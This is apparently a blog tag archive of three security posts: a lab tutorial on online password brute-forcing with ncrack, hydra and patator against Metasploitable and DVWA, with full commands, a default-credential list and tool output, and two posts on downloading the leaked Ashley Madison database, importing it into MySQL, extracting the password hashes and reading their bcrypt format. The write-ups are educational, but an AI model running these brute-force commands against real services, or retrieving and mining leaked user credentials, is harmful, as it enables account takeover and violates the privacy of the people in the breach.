Tag Archives: passwords

Online brute force attacks

Online password attacks involve attacking services such as FTP, TELNET, SSH, or HTTP to try and guess a password. This type of attack differs from an offline attack in that in offline attacks, you have a hash and are only limited by the speed of your cracking machine, without communicating with the target. Online attacks are in constant communication with the target.

Because of this, online password attacks are extremely situational, and are very limited. The speed of the guesses can be affected by several your bandwidth, the target’s bandwidth, throttling the amount of guesses (tar pitting), account lockouts, and changing passwords. It’s also very loud and will surely be detected by an IDS.

Online brute force attacks that iterate over millions of passwords and usernames such as the rockyou.txt dictionary are impractical. Online attacks are much more effective with a smaller list containing the default/weak credentials.

In this post, I’ll use some popular tools used for cracking passwords over the wire.

To make things easier, I’ll use a small subset of the rockyou.txt wordlist, and make sure to insert the correct password in the list.


Ncrack is a very fast network authentication cracking tool, which is helpful for testing a large number of hosts for weak passwords.

In this case, I’ll audit our Metasploitable box for default easily cracked FTP credentials.

# ncrack -p 21 -user postgres -P shortlist.txt
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2015-11-08 23:15 EST
Discovered credentials for ftp on 21/tcp: 21/tcp ftp: 'postgres' 'postgres'
Ncrack done: 1 service scanned in 30.01 seconds.
Ncrack finished.


Hydra is another tool that can crack passwords over the network using a list of usernames and passwords.

# hydra -l postgres -P shortlist.txt ftp
Hydra (http://www.thc.org/thc-hydra) starting at 2015-12-12 22:45:10
[DATA] max 16 tasks per 1 server, overall 64 tasks, 102 login tries (l:1/p:102), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host:   login: postgres   password: postgres
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-12-12 22:45:13

Hydra can also be used as an online password cracker.

I will need some information about the web form before I can unleash Hydra on it, specifically:

  • IP address/hostname
  • HTTP request method (i.e. GET or POST)
  • HTTP request parameters
  • Success/failure responses
  • Session cookies
  • Presence of lockout features that may slow down our cracking attempt
  • And, of course, a list of usernames and passwords.

For a username and password list, I rattled off the most popular usernames and passwords that came to mind.

  • admin
  • administrator
  • sysadmin
  • root
  • pass
  • password
  • admin
  • administrator
  • sysadmin
  • 1234
  • 12345
  • 123456
  • 1234567
  • 12345678
  • pass1234
  • password1234
  • password12345
  • default
  • root
  • toor

For the host, I decided to crack the login form for the Damn Vulnerable Web App https://github.com/RandomStorm/DVWA

We can capture information about the HTTP requests and responses using OWASP, but I decided to use a Firefox browser addon called Tamper Data.

Navigating to, and with Tamper Data running, I enter some data into the username and password fields.

# hydra -L usernames.txt -P shorterlist.txt http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: security;high;PHPSESSID=4npusjem9f38v9ao60qq48idm7"

-L and -P will iterate through a file, while -l and -p should be used if a single username/password is supplied

I can tell it’s an HTTP GET method one of two ways: Viewing the source of the page will the form action is a GET. I can also see the GET request inside of Tamper Data.

The next string includes some arguments Hydra needs. The arguments are separated by a colon.

The first argument tells Hydra where the address of the login form

The second argument tells Hydra where the username, password, and any other parameters passed to the server

The third argument contains a string that we know will appear upon either a successful or a failed login. If Hydra sees this string in an HTTP response, it will assume the login information was correct.

I also needed the presence of a fourth optional argument. Inside of DWVA is the web form vulnerable to brute force. We are required to log in to DWVA to access this.

This is done with cookies. We can see these inside of Tamper Data. We are looking for the PHPSESSID cookie (See https://security.stackexchange.com/questions/37020/why-does-hydra-return-16-valid-passwords-when-none-are-valid )

Hydra (http://www.thc.org/thc-hydra) starting at 2015-12-12 22:26:43
[DATA] max 16 tasks per 1 server, overall 64 tasks, 64 login tries (l:4/p:16), ~0 tries per task
[DATA] attacking service http-get-form on port 80
[80][http-get-form] host: login: admin password: password
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 23 todo in 00:01h, 16 active
[STATUS] 31.00 tries/min, 62 tries in 00:02h, 2 todo in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-12-12 22:29:37


Medusa and Hydra do the same thing. Some people prefer Medusa, others Hydra. According to the author of Medusa, Medusa crashes less, more modular, and faster due to multithreading.

I think which tool you choose is completely your preference; but I prefer Hydra solely because that is what I learned how to use first.


Patator is a fast, multithreaded Python application supporting a lot of modules for different services.

$ ./patator.py ftp_login host= user=postgres password=FILE0 0=/usr/share/wordlists/shortlist.txt
15:29:01 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-12-13 15:29 EST
15:29:01 patator    INFO -                                                                              
15:29:01 patator    INFO - code  size    time | candidate                          |   num | mesg
15:29:01 patator    INFO - -----------------------------------------------------------------------------
15:29:01 patator    INFO - 230   17     0.014 | postgres                           |     8 | Login successful.
15:29:04 patator    INFO - 530   16     2.879 | 123456                             |     1 | Login incorrect.
15:29:04 patator    INFO - 530   16     2.869 | 12345                              |     2 | Login incorrect.
15:29:04 patator    INFO - 530   16     2.861 | 123456789                          |     3 | Login incorrect.
15:29:04 patator    INFO - 530   16     2.872 | password                           |     4 | Login incorrect.
15:29:37 patator    INFO - Hits/Done/Skip/Fail/Size: 102/102/0/0/102, Avg: 2 r/s, Time: 0h 0m 35s

Ashley Madison part 2: Cryptanalysis

Lets look at these password hashes:


Now when looking at the passwords, I notice that they all start with the marker “$2a$12$”.

This is Linux /etc/shadow notation. Linux keep the passwords in the /etc/shadow file. This file is readable only to root accounts. It contains the password hashes of all users. We call “shadow” because it is a shadow file of the /etc/passwd file. /etc/passwd is world readable, so we obviously don’t want to store our password hashes in this file. When we shadow the password file, /etc/passwd will only store an “x” for the password.

$ sudo cat /etc/passwd

This contains our username:password (shadowed)

Now if I look at the contents of our shadow file (I changed the salt and hash)

$ sudo cat /etc/shadow

This contains our username:$algorithm$salt$hashed password, followed by information regarding password changes. In this case, the $1$ means the hash was MD5.

Some other prefixes I found:

$0$ – DES
$2$, $2a$ = Blowfish
$3$ = NT hash
$5$ = SHA-256
$6$ = SHA-512

Back to the marker “$2a$12$” in the database. I know that the passwords were hashed with the Blowfish algorithm. The bcrypt algorithm implements Blowfish, so I’m that was the algorithm the website used to hash password. The $12$ means a cost factor of 12, or 12 rounds of bcrypt.

bcrypt, along with scrypt and PBKDF2 are a family of algorithms for hashing passwords. They are all considered “slow” for a computer to perform in relation to other algorithms like MD5 or SHA, so that if a database is compromised and the hashes revealed to an outsider, any brute force or dictionary attacks will be handicapped.

bcrypt has the advantage of being hard for a GPU to do. GPUs are many times faster at performing hashes then the CPU, so crackers often utilize one or more GPUs in parallel to crack passwords. According to https://security.stackexchange.com/questions/4781/do-any-security-experts-recommend-bcrypt-for-password-storage/6415#6415

“Bcrypt happens to heavily rely on accesses to a table which is constantly altered throughout the algorithm execution. This is very fast on a PC, much less so on a GPU, where memory is shared and all cores compete for control of the internal memory bus.”

With that being said, it is unlikely I will be able to crack any passwords from this database.

Another thing I noticed was the repeated password of “111111Iwillneverdoitagain”. I would assume that this is how the website disabled accounts, since it would be extremely difficult to find a string whose hash equals “111111Iwillneverdoitagain”.

Ashley Madison part 1: Getting the database

I downloaded the Ashley Madison database dump.

The dump was available here http://pastie.org/10360347. I downloaded it in an Ubuntu VM for safety precautions.

The files available:


The file member_login.dump is a MySQL database backup. First I installed the database with:

$ sudo apt-get install mysql-server

Start MySQL with

$ mysql -u root -p

Now we need to create a new database and restore from the backup. We’ll go ahead and import member_login.dump and member_details.dump:

$ mysql

> create database AshMad

> use AshMad

$ mysql -u root -p < Downloads/dmps/member_login.dump

$ mysql -u root -p < Downloads/dumps/member_details.dump

And now MySQL will import the database.
Note: Do not use the MySQL source command to import large databases. Source is designed to run a small number of SQL queries, and will take a long time to import a large database.

Let’s explore the imported tables.

mysql> use AshMad;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
| Tables_in_AshMad |
| member_login     |
| member_details   |
2 rows in set (0.00 sec)

mysql> show columns from member_login;
| Field    | Type         | Null | Key | Default | Extra          |
| pnum     | int(11)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(28)  | NO   | UNI |         |                |
| password | varchar(128) | NO   |     |         |                |
| loginkey | varchar(36)  | NO   | MUL |         |                |
| notify   | int(4)       | NO   |     | 0       |                |
5 rows in set (0.00 sec)

Now we’re going to dump the password column into a text file for a password cracker. This might take a few minutes, as there are almost 4 million rows.

> select password from member_login into outfile 'ashmadpasswords.txt' lines terminated by '\n';

Now we have the passwords in a .txt document in the file /var/lib/mysql/AshMad/ashmadpasswords.txt;

Lets check the file to see what we have:

$ head -10 /var/lib/mysql/AshMad/ashmadpasswords.txt 

And that’s it for part 1.